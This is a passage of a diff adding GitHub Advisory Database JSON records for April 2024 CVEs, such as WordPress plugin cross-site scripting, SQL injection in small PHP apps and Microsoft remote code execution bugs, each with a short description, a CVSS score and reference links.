"2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2023-52364" + ], + "details": "Vulnerability of input parameters being not strictly verified in the RSMC module.\nImpact: Successful exploitation of this vulnerability may cause out-of-bounds write.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52364" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vf3j-xp87-c8f3/GHSA-vf3j-xp87-c8f3.json b/advisories/unreviewed/2024/04/GHSA-vf3j-xp87-c8f3/GHSA-vf3j-xp87-c8f3.json new file mode 100644 index 00000000000..39b8303a2f8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vf3j-xp87-c8f3/GHSA-vf3j-xp87-c8f3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf3j-xp87-c8f3", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26202" + ], + "details": "DHCP Server Service Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26202" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vfqq-mj6j-2rqq/GHSA-vfqq-mj6j-2rqq.json b/advisories/unreviewed/2024/04/GHSA-vfqq-mj6j-2rqq/GHSA-vfqq-mj6j-2rqq.json new file mode 100644 index 00000000000..f905248f8c4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vfqq-mj6j-2rqq/GHSA-vfqq-mj6j-2rqq.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfqq-mj6j-2rqq", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2023-52717" + ], + "details": "Permission verification vulnerability in the lock screen module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52717" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vfrv-pg2f-4468/GHSA-vfrv-pg2f-4468.json b/advisories/unreviewed/2024/04/GHSA-vfrv-pg2f-4468/GHSA-vfrv-pg2f-4468.json new file mode 100644 index 00000000000..61f740e8898 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vfrv-pg2f-4468/GHSA-vfrv-pg2f-4468.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfrv-pg2f-4468", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-1780" + ], + "details": "The BizCalendar Web plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.1.0.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1780" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bizcalendar-web/trunk/admin/bizcalendar-admin.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b76b12ed-1bb4-4aa9-ab9f-06084c667f40?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T08:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vfvp-6x8c-w6jm/GHSA-vfvp-6x8c-w6jm.json b/advisories/unreviewed/2024/04/GHSA-vfvp-6x8c-w6jm/GHSA-vfvp-6x8c-w6jm.json new file mode 100644 index 00000000000..7dc3ad1259d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vfvp-6x8c-w6jm/GHSA-vfvp-6x8c-w6jm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfvp-6x8c-w6jm", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1461" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘style’ attribute of the Team Members widget in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1461" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3048237/addons-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d9d37248-d024-4465-a1e6-d8f2d3a2e02f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vg84-7fr9-9r2h/GHSA-vg84-7fr9-9r2h.json b/advisories/unreviewed/2024/04/GHSA-vg84-7fr9-9r2h/GHSA-vg84-7fr9-9r2h.json new file mode 100644 index 00000000000..a0c46bdc909 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vg84-7fr9-9r2h/GHSA-vg84-7fr9-9r2h.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg84-7fr9-9r2h", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-30706" + ], + "details": "An issue was discovered in ROS2 Dashing Diademata versions ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3, allows remote attackers to execute arbitrary code, escalate privileges, obtain sensitive information, and gain unauthorized access to multiple ROS2 nodes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30706" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30706" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vgxh-95xm-c2p8/GHSA-vgxh-95xm-c2p8.json b/advisories/unreviewed/2024/04/GHSA-vgxh-95xm-c2p8/GHSA-vgxh-95xm-c2p8.json new file mode 100644 index 00000000000..88fc8eeb704 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vgxh-95xm-c2p8/GHSA-vgxh-95xm-c2p8.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgxh-95xm-c2p8", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3537" + ], + "details": "A vulnerability was found in Campcodes Church Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/admin_user.php. The manipulation of the argument firstname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259907.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3537" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%204.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259907" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259907" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312538" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vhhh-r6h5-2r9f/GHSA-vhhh-r6h5-2r9f.json b/advisories/unreviewed/2024/04/GHSA-vhhh-r6h5-2r9f/GHSA-vhhh-r6h5-2r9f.json new file mode 100644 index 00000000000..3a017321f85 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vhhh-r6h5-2r9f/GHSA-vhhh-r6h5-2r9f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhhh-r6h5-2r9f", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-0076" + ], + "details": "\nNVIDIA CUDA toolkit for all platforms contains a vulnerability in cuobjdump and nvdisasm where an attacker may cause a crash by tricking a user into reading a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0076" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5517" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vjgv-q4qp-fr6p/GHSA-vjgv-q4qp-fr6p.json b/advisories/unreviewed/2024/04/GHSA-vjgv-q4qp-fr6p/GHSA-vjgv-q4qp-fr6p.json new file mode 100644 index 00000000000..1b76aca4733 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vjgv-q4qp-fr6p/GHSA-vjgv-q4qp-fr6p.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjgv-q4qp-fr6p", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1352" + ], + "details": "The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access & modification of data due to a missing capability check on the rtcl_import_location() rtcl_import_category() functions in all versions up to, and including, 3.0.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create terms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1352" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/classified-listing/trunk/app/Controllers/Ajax/Import.php?rev=2824166" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/classified-listing/trunk/app/Controllers/Ajax/Import.php?rev=3061893" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f5da4cdd-15c7-41a6-be2f-e31bd407ae05?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vjh4-v73g-fc8r/GHSA-vjh4-v73g-fc8r.json b/advisories/unreviewed/2024/04/GHSA-vjh4-v73g-fc8r/GHSA-vjh4-v73g-fc8r.json new file mode 100644 index 00000000000..fec773888ed --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vjh4-v73g-fc8r/GHSA-vjh4-v73g-fc8r.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjh4-v73g-fc8r", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30216" + ], + "details": "Cash Management in SAP S/4 HANA does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. By exploiting this vulnerability, attacker can add notes in the review request with 'completed' status affecting the integrity of the application. Confidentiality and Availability are not impacted.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30216" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3427178" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vjwp-m299-85vg/GHSA-vjwp-m299-85vg.json b/advisories/unreviewed/2024/04/GHSA-vjwp-m299-85vg/GHSA-vjwp-m299-85vg.json new file mode 100644 index 00000000000..dd02b62e007 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vjwp-m299-85vg/GHSA-vjwp-m299-85vg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjwp-m299-85vg", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29046" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29046" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29046" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vm7h-73m3-4232/GHSA-vm7h-73m3-4232.json b/advisories/unreviewed/2024/04/GHSA-vm7h-73m3-4232/GHSA-vm7h-73m3-4232.json new file mode 100644 index 00000000000..8e6dcd6bcb0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vm7h-73m3-4232/GHSA-vm7h-73m3-4232.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm7h-73m3-4232", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-30701" + ], + "details": "An insecure logging vulnerability in ROS2 Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to obtain sensitive information via inadequate security measures implemented within the logging mechanisms of ROS2.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30701" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30701" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vmxm-7mh7-6wxv/GHSA-vmxm-7mh7-6wxv.json b/advisories/unreviewed/2024/04/GHSA-vmxm-7mh7-6wxv/GHSA-vmxm-7mh7-6wxv.json new file mode 100644 index 00000000000..2f6d529cb00 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vmxm-7mh7-6wxv/GHSA-vmxm-7mh7-6wxv.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmxm-7mh7-6wxv", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-3360" + ], + "details": "A vulnerability, which was classified as critical, was found in SourceCodester Online Library System 1.0. Affected is an unknown function of the file admin/books/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259464.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3360" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-02" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310424" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vp88-rj49-wqhp/GHSA-vp88-rj49-wqhp.json b/advisories/unreviewed/2024/04/GHSA-vp88-rj49-wqhp/GHSA-vp88-rj49-wqhp.json new file mode 100644 index 00000000000..6ee98546b64 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vp88-rj49-wqhp/GHSA-vp88-rj49-wqhp.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp88-rj49-wqhp", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2348" + ], + "details": "The Gum Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Meta widget in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2348" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/gum-elementor-addon/trunk/widgets/blog_post_meta.php#L1171" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051383%40gum-elementor-addon&new=3051383%40gum-elementor-addon&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ade1eddf-cfcc-4956-8015-8d9a592cc252?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vr93-vfw5-rhwx/GHSA-vr93-vfw5-rhwx.json b/advisories/unreviewed/2024/04/GHSA-vr93-vfw5-rhwx/GHSA-vr93-vfw5-rhwx.json new file mode 100644 index 00000000000..45ec002efa8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vr93-vfw5-rhwx/GHSA-vr93-vfw5-rhwx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr93-vfw5-rhwx", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2918" + ], + "details": "Improper input validation in PAM JIT elevation feature in Devolutions Server 2024.1.6 and earlier allows an attacker with access to the PAM JIT elevation feature to forge the displayed group in the PAM JIT elevation checkout request via a specially crafted request.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2918" + }, + { + "type": "WEB", + "url": "https://devolutions.net/security/advisories/DEVO-2024-0006" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vvm6-xgvv-w5gg/GHSA-vvm6-xgvv-w5gg.json b/advisories/unreviewed/2024/04/GHSA-vvm6-xgvv-w5gg/GHSA-vvm6-xgvv-w5gg.json new file mode 100644 index 00000000000..8d9a94c355d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vvm6-xgvv-w5gg/GHSA-vvm6-xgvv-w5gg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vvm6-xgvv-w5gg", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2789" + ], + "details": "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Calendy widget in all versions up to, and including, 3.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2789" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3064385%40happy-elementor-addons%2Ftrunk&old=3044937%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=#file13" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb93853b-a6e0-42d1-8b10-b391984603f2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w249-f84q-3v47/GHSA-w249-f84q-3v47.json b/advisories/unreviewed/2024/04/GHSA-w249-f84q-3v47/GHSA-w249-f84q-3v47.json new file mode 100644 index 00000000000..d94ed5a6051 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w249-f84q-3v47/GHSA-w249-f84q-3v47.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w249-f84q-3v47", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3097" + ], + "details": "The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3097" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3063940/nextgen-gallery/trunk/src/REST/Admin/Block.php?old=3003333&old_path=nextgen-gallery%2Ftrunk%2Fsrc%2FREST%2FAdmin%2FBlock.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve" + }, + { + "type": "WEB", + "url": "https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w27w-5f55-hf65/GHSA-w27w-5f55-hf65.json b/advisories/unreviewed/2024/04/GHSA-w27w-5f55-hf65/GHSA-w27w-5f55-hf65.json new file mode 100644 index 00000000000..3dd9d65e199 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w27w-5f55-hf65/GHSA-w27w-5f55-hf65.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w27w-5f55-hf65", + "modified": "2024-04-09T09:31:12Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-31368" + ], + "details": "Missing Authorization vulnerability in PenciDesign Soledad.This issue affects Soledad: from n/a through 8.4.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-2-unauthenticated-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w36m-8p9q-xcc9/GHSA-w36m-8p9q-xcc9.json b/advisories/unreviewed/2024/04/GHSA-w36m-8p9q-xcc9/GHSA-w36m-8p9q-xcc9.json new file mode 100644 index 00000000000..95962ed9e84 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w36m-8p9q-xcc9/GHSA-w36m-8p9q-xcc9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w36m-8p9q-xcc9", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52347" + ], + "details": "In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52347" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w4pg-xm2c-w4wj/GHSA-w4pg-xm2c-w4wj.json b/advisories/unreviewed/2024/04/GHSA-w4pg-xm2c-w4wj/GHSA-w4pg-xm2c-w4wj.json new file mode 100644 index 00000000000..1a08cb54de4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w4pg-xm2c-w4wj/GHSA-w4pg-xm2c-w4wj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4pg-xm2c-w4wj", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28944" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28944" + }, + { + 